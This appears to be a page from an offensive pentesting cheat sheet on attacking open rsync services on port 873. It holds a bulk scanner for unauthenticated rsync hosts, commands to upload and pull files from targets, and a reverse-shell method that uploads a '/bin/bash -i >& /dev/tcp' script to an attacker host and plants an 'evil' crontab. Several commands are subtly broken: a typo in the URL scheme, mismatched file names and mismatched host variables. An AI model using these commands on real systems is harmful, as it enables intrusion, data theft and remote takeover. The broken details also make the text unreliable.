873 - Rsync
Potential Risks
Unauthorized Access
# RHOST=remoteHost; RPORT=873
rsync rsyns://$RHOST:$RPORT
# Bulk testing
# RHOST_LIST=hosts.txt
run() {
while IFS= read -r LINE
do
if [[ "$LINE" == *":"* ]]; then
RHOST=${LINE%%:*}
RPORT=${LINE#*:}
else
RHOST=$LINE
RPORT=873
fi
if [[ -n "$(sshpass -p '' rsync rsync://$RHOST:$RPORT 2>/dev/null)" ]]; then
echo "[SUCCESS] rsync://$RHOST:$RPORT"
fi
done < "$RHOST_LIST"
}
run | awk -F '//' '{print $2}'Exploitation
Upload File
Method 1: Regular upload files
# RHOST=remoteHost; RPORT=873
rsync -av /path/to/localFile rsync://$RHOST:$RPORT/path/to/remoteFileMethod 2: Upload crontab to reverse shell
# RHOST=remoteHost; RPORT=873
# EHOST=evilHost; EPORT=6789
# Method 1: Modify the `crontab` of the remote server
# Step 1: Download the `crontab` of the remote server
# Step 2: Added reverse shell task
# Step 3: Upload the evil 'crontab'
# Method 2: Added the `crontab` of the remote server
# Step 1: Create evil `crontab`
# Step 2: Upload the evil 'crontab'For more information, please refer to page OOB > Reverse Shell.
Method 3: Upload the executable reverse shell file and add crontab to execute
# RHOST=remoteHost; RPORT=873
# EHOST=evilHost; EPORT=6789
# Step 1: Create a reverse shell script and add executable permissions
echo "#\!/bin/bash\n/bin/bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1" > /tmp/santa_revs.sh
chmod +x /tmp/santaclaus_revs.sh
# Step 2: Upload reverse shell script
rsync -av /tmp/santaclaus_revs.sh rsync://$RHOST:$RPORT/src/tmp/santaclaus_revs.sh
# Step 3: Download and modify the target server crontab
# Step 4: Upload evil crontabFor more information, please refer to page OOB > Reverse Shell.
Download File
# RHOST=remoteHost; RPORT=873
rsync -av rsync://$RHOST:$RPORT/path/to/remoteFile /path/to/localFile最后更新于